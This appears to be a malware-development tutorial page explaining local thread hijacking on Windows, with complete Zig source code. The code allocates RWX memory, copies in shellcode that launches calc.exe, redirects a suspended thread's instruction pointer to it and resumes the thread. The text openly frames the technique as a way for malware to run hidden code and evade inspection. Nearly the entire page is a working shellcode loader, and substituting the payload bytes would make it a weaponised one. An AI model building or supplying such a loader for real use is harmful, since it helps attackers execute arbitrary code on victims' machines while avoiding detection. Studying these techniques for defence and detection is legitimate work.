Local Thread Creation
TL;DR
Local thread creation is a stealthy way to run shellcode within the context of the current process. Instead of launching an entirely new program, the malware spawns a thread in a suspended state and alters its execution context so the instruction pointer jumps to the payload. When resumed, the thread appears to be part of the normal application yet secretly executes arbitrary code. This approach avoids creating new processes and helps the malicious activity blend in with legitimate threads, making casual inspection much harder.
Code Walkthrough
main.zig
// NOTE:
// We run our payload in a hijacked thread instead of the one we created.
// This is because the entry of the thread we created must pointed to the
// base address of our payload in memory, while the hijacked one will pointed
// to the normal process function, so it will let the thread seems harmless,
// which is a good news for us.
const std = @import("std");
const windows = std.os.windows;
const print = std.debug.print;
// Windows API types
const HANDLE = windows.HANDLE;
const DWORD = windows.DWORD;
const BOOL = windows.BOOL;
const PVOID = windows.PVOID;
const PBYTE = [*]u8;
const SIZE_T = windows.SIZE_T;
const WINAPI = windows.WINAPI;
const LPTHREAD_START_ROUTINE = *const fn (?*anyopaque) callconv(WINAPI) DWORD;
// Memory protection constants
const PAGE_READWRITE: DWORD = windows.PAGE_READWRITE;
const PAGE_EXECUTE_READWRITE: DWORD = windows.PAGE_EXECUTE_READWRITE;
const MEM_COMMIT: DWORD = windows.MEM_COMMIT;
const MEM_RESERVE: DWORD = windows.MEM_RESERVE;
// Thread creation constants
const CREATE_SUSPENDED: DWORD = 0x00000004;
const INFINITE: DWORD = 0xFFFFFFFF;
// Context flags
const CONTEXT_CONTROL: DWORD = 0x00000001;
const CONTEXT_ALL: DWORD = 0x00100000 | 0x00000001 | 0x00000002 | 0x00000004 | 0x00000008 | 0x00000010;
// Thread context structure for x64
const CONTEXT = extern struct {
// Register parameter home addresses (reserved for debugger use)
P1Home: u64,
P2Home: u64,
P3Home: u64,
P4Home: u64,
P5Home: u64,
P6Home: u64,
// Control flags
ContextFlags: DWORD,
MxCsr: DWORD,
// Segment registers and processor flags
SegCs: u16,
SegDs: u16,
SegEs: u16,
SegFs: u16,
SegGs: u16,
SegSs: u16,
EFlags: DWORD,
// Debug registers
Dr0: u64,
Dr1: u64,
Dr2: u64,
Dr3: u64,
Dr6: u64,
Dr7: u64,
// Integer registers
Rax: u64,
Rcx: u64,
Rdx: u64,
Rbx: u64,
Rsp: u64,
Rbp: u64,
Rsi: u64,
Rdi: u64,
R8: u64,
R9: u64,
R10: u64,
R11: u64,
R12: u64,
R13: u64,
R14: u64,
R15: u64,
// Program counter
Rip: u64,
// Floating point state
FltSave: [512]u8, // XMM_SAVE_AREA32
// Vector registers
VectorRegister: [26][16]u8,
VectorControl: u64,
// Special debug control registers
DebugControl: u64,
LastBranchToRip: u64,
LastBranchFromRip: u64,
LastExceptionToRip: u64,
LastExceptionFromRip: u64,
};
// External function declarations
extern "kernel32" fn CreateThread(
lpThreadAttributes: ?*anyopaque,
dwStackSize: SIZE_T,
lpStartAddress: LPTHREAD_START_ROUTINE,
lpParameter: ?*anyopaque,
dwCreationFlags: DWORD,
lpThreadId: ?*DWORD,
) callconv(WINAPI) ?HANDLE;
extern "kernel32" fn VirtualAlloc(
lpAddress: ?*anyopaque,
dwSize: SIZE_T,
flAllocationType: DWORD,
flProtect: DWORD,
) callconv(WINAPI) ?*anyopaque;
extern "kernel32" fn VirtualProtect(
lpAddress: *anyopaque,
dwSize: SIZE_T,
flNewProtect: DWORD,
lpflOldProtect: *DWORD,
) callconv(WINAPI) BOOL;
extern "kernel32" fn GetThreadContext(
hThread: HANDLE,
lpContext: *CONTEXT,
) callconv(WINAPI) BOOL;
extern "kernel32" fn SetThreadContext(
hThread: HANDLE,
lpContext: *const CONTEXT,
) callconv(WINAPI) BOOL;
extern "kernel32" fn ResumeThread(hThread: HANDLE) callconv(WINAPI) DWORD;
extern "kernel32" fn WaitForSingleObject(hHandle: HANDLE, dwMilliseconds: DWORD) callconv(WINAPI) DWORD;
extern "kernel32" fn CloseHandle(hObject: HANDLE) callconv(WINAPI) BOOL;
extern "kernel32" fn GetLastError() callconv(WINAPI) DWORD;
const calc_payload = [_]u8{ 0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x00 };
// Dummy function to use for the sacrificial thread
fn DummyFunction(lpParameter: ?*anyopaque) callconv(WINAPI) DWORD {
_ = lpParameter; // Suppress unused parameter warning
// Stupid code
const seed = @as(u32, @intCast(std.time.timestamp()));
var prng = std.Random.DefaultPrng.init(seed);
const j = prng.random().int(i32);
const i = j *% j; // Use wrapping multiplication to avoid overflow
_ = i; // Suppress unused variable warning
return 0;
}
// Thread hijacking function
fn runViaClassicThreadHijacking(hThread: HANDLE, pPayload: []const u8) bool {
var pAddress: ?*anyopaque = null;
var dwOldProtection: DWORD = 0;
// .ContextFlags can be CONTEXT_CONTROL or CONTEXT_ALL as well
var ThreadCtx = std.mem.zeroes(CONTEXT);
ThreadCtx.ContextFlags = CONTEXT_CONTROL;
// NOTE:
// In Zig, there's no implicit initialization like C, so we need
// to manually set all other fields to be 0. While in C, the uninitialized
// fields will be automatically set to 0.
//
// NOTE:
// Reference C99 Standard 6.7.8.21:
// If there are fewer initializers in a brace-enclosed list than there are
// elements or members of an aggregate, or fewer characters in a string
// literal used to initialize an array of known size than there are elements
// in the array, the remainder of the aggregate shall be initialized implicitly
// the same as objects that have static storage duration.
//
// NOTE: So the ThreadCtx above is equals to this:
// var ThreadCtx = CONTEXT{
// .ContextFlags = CONTEXT_CONTROL,
// .P1Home = 0,
// .P2Home = 0,
// .P3Home = 0,
// .P4Home = 0,
// .P5Home = 0,
// .P6Home = 0,
// .MxCsr = 0,
// .SegCs = 0,
// .SegDs = 0,
// .SegEs = 0,
// .SegFs = 0,
// .SegGs = 0,
// .SegSs = 0,
// .EFlags = 0,
// .Dr0 = 0,
// .Dr1 = 0,
// .Dr2 = 0,
// .Dr3 = 0,
// .Dr6 = 0,
// .Dr7 = 0,
// .Rax = 0,
// .Rcx = 0,
// .Rdx = 0,
// .Rbx = 0,
// .Rsp = 0,
// .Rbp = 0,
// .Rsi = 0,
// .Rdi = 0,
// .R8 = 0,
// .R9 = 0,
// .R10 = 0,
// .R11 = 0,
// .R12 = 0,
// .R13 = 0,
// .R14 = 0,
// .R15 = 0,
// .Rip = 0,
// .FltSave = std.mem.zeroes([512]u8),
// .VectorRegister = std.mem.zeroes([26][16]u8),
// .VectorControl = 0,
// .DebugControl = 0,
// .LastBranchToRip = 0,
// .LastBranchFromRip = 0,
// .LastExceptionToRip = 0,
// .LastExceptionFromRip = 0,
// };
// Allocating memory for the payload
const payload_size_dword: DWORD = @intCast(pPayload.len); // This is for adapting Win API param size
pAddress = VirtualAlloc(null, payload_size_dword, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pAddress == null) {
print("[!] VirtualAlloc Failed With Error : {d}\n", .{GetLastError()});
return false;
}
// Copying the payload to the allocated memory
const dest = @as([*]u8, @ptrCast(pAddress.?))[0..pPayload.len];
@memcpy(dest, pPayload);
// Changing the memory protection
if (VirtualProtect(pAddress.?, payload_size_dword, PAGE_EXECUTE_READWRITE, &dwOldProtection) == 0) {
print("[!] VirtualProtect Failed With Error : {d}\n", .{GetLastError()});
return false;
}
// Getting the original thread context
if (GetThreadContext(hThread, &ThreadCtx) == 0) {
print("[!] GetThreadContext Failed With Error : {d}\n", .{GetLastError()});
return false;
}
// Updating the next instruction pointer to be equal to the payload's address
ThreadCtx.Rip = @intFromPtr(pAddress.?);
// in case of a x64 payload injection : we change the value of `Rip`
// in case of a x32 payload injection : we change the value of `Eip`
// Setting the new updated thread context
if (SetThreadContext(hThread, &ThreadCtx) == 0) {
print("[!] SetThreadContext Failed With Error : {d}\n", .{GetLastError()});
return false;
}
return true;
}
// Wait for user input (equivalent to getchar())
fn waitForEnter() void {
var buffer: [256]u8 = undefined;
_ = std.io.getStdIn().reader().readUntilDelimiterOrEof(buffer[0..], '\n') catch {};
}
// Main function (equivalent to C main)
pub fn main() !void {
var hThread: ?HANDLE = null;
var dwThreadId: DWORD = 0;
// Creating sacrificial thread in suspended state
//
// NOTE:
// We can also use SuspendThread to suspend a thread.
// To lean more: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread
hThread = CreateThread(null, 0, &DummyFunction, null, CREATE_SUSPENDED, &dwThreadId);
if (hThread == null) {
print("[!] CreateThread Failed With Error : {d}\n", .{GetLastError()});
return;
}
print("[i] Hijacking Thread Of Id : {d}\n", .{dwThreadId});
// Hijacking the sacrificial thread created
if (!runViaClassicThreadHijacking(hThread.?, &calc_payload)) {
_ = CloseHandle(hThread.?);
return;
}
print("[+] DONE\n", .{});
print("[#] Press <Enter> To Run The Payload ...", .{});
waitForEnter();
// Resuming suspended thread, so that it runs our shellcode
_ = ResumeThread(hThread.?);
// Wait for the thread to complete
_ = WaitForSingleObject(hThread.?, INFINITE);
print("[#] Press <Enter> To Quit...", .{});
waitForEnter();
// Cleanup
_ = CloseHandle(hThread.?);
}